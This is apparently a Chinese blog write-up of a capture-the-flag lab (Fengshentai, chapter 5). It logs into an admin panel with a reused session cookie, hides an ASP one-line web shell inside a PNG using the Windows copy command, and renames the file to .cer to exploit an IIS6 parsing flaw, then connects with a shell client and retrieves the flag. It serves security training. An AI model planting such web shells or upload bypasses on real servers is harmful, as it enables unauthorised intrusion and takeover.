封神台靶场-第五章

第五章- 进击!拿到Web最高权限

Tips:
通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。

  1. 来到传送门提示修改cookie,这里我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。
    cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
    在这里插入图片描述
    在存储里将上面的cookie值进行修改:
    在这里插入图片描述
    在这里插入图片描述

  2. 根据提示信息这里我们要进行上传文件木马,获得shell,经过尝试可以在以下位置上传文件(只要能上传就好),我是在图二位置上传的
    在这里插入图片描述
    在这里插入图片描述
    上传了一个php小马,发现后台做了过略,而且是白名单,想着绕过,经过抓包修改文件等等发现不行无法绕过,只能上传图片木马。

  3. 制作图片木马(一个asp小马,和一张图片)
    asp小马 <%eval request(“666”)%>
    利用win自带命令将图片和木马合并
    在这里插入图片描述
    命令:copy xxx.asp/a + xxx.png/b xxx.png
    在这里插入图片描述
    查看和并后的文件木马写入成功:
    在这里插入图片描述

  4. 上传木马,菜刀连接:
    在这里插入图片描述
    在上传文件那里查看自己上传的木马文件,点看复制文件地址,菜刀连接,发现无法连接,这里是因为无法解析,这里可以发现服务器是IIS6,百度发现iis6有解析漏洞,本题目主要是考iis6解析漏洞。iis6
    可以将cer文件解析为asp,我们可以将刚才生成的666.png文件改名为.cer文件再次上传。
    在这里插入图片描述
    在这里插入图片描述
    点开复制文件地址菜刀连接成功(这里需要注意菜刀连接时,脚本类型选择asp文件,):
    在这里插入图片描述
    5.寻找flag
    在这里插入图片描述
    zkz{G3t_the_admin!Sh3ll}

猜你喜欢

转载自blog.csdn.net/Mr_helloword/article/details/107291296